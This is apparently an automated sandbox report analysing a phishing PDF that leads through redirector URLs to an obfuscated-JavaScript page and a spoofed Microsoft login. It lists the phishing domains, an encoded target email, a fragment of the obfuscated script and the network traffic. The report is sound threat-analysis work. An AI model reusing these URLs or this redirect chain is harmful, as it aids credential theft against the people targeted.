Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bontrageroutdoors_Project_Update_202557516.pdf

Overview

General Information

Sample name:Bontrageroutdoors_Project_Update_202557516.pdf
Analysis ID:1588098
MD5:53e9f4e07eaeb212156d58106f2f9e11
SHA1:af8e5e25a4380e915747dfdaaa14a585951bea39
SHA256:6e3ae62a864941f4ecc40ad9c93b56bbc769bb0a9931341c188a06a307261bd2

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 7080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Bontrageroutdoors_Project_Update_202557516.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6492 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2124 --field-trial-handle=1552,i,16697441943994709585,9088590074963945939,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.babylon-software.com/redirects/redir.cgi?type=wikipedia&full_url=https%3A%2F%2Fgfsouto.com.br%2Fcgi-documents%2F%23amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1788,i,14068435208474210693,11660432059322671289,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: PDF documentJoe Sandbox AI: PDF document contains QR code
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5s... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The heavy obfuscation and use of encoded strings further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an untrusted domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior, posing a significant security risk.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of preventing analysis and redirecting users to a potentially malicious login page.
Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://reprise.repriseyes.ru
Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://reprise.repriseyes.ru
Source: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29tHTTP Parser: (function(_0x4a596b,_0x31a4ff){const _0x590499=_0xaaf2,_0x2b2108=_0x4a596b();while(!![]){try{cons
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: a7c6f4e5-ac2c-4eb9-9a72-dc1f9cb088336ed3935c-46e0-4896-9b9f-ae79a76052fa
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29tHTTP Parser: No favicon
Source: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29tHTTP Parser: No favicon
Source: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.comHTTP Parser: No favicon
Source: https://reprise.repriseyes.ru/ri0M/#Djessica.loving@bontrageroutdoors.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721353467195716.YTdjNmY0ZTUtYWMyYy00ZWI5LTlhNzItZGMxZjljYjA4ODMzNmVkMzkzNWMtNDZlMC00ODk2LTliOWYtYWU3OWE3NjA1MmZh&ui_locales=en-US&mkt=en-US&client-request-id=daef2261-7f6f-49c8-8b61-7872693623a4&state=zuEtJdywatT9gJeMPXyaZgFsika_eRf_yx1la2UIxPCfYULeqfbrbMz4E0dnkOUhKXXgaKe8nKPcPKTbA56lW90eRozaeEu1sYyGCHW3XVz8G43wv6YrO0SalPir8cgCV89myTAbMkD7kAXDm2kiyUYhd0gWCAr_r0xVkoksBb7OofQ22V2-gNCo5Pen0L-RimliZpzTRLozBOPZtmMYD2quZwJIhRMPlpTqHomMNYPY1K3qJYBRvEcTfhoBFTld3Xt2QPMNrx32--FINffiiA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 96.17.64.171
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.babylon-software.com
Source: global trafficDNS traffic detected: DNS query: gfsouto.com.br
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: picsum.photos
Source: global trafficDNS traffic detected: DNS query: fastly.picsum.photos
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: reprise.repriseyes.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: g3su5gwndwqyymo0d5hm5pnuvuzr1j401t2nhxlz8lijntzzlmt.expritraw.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
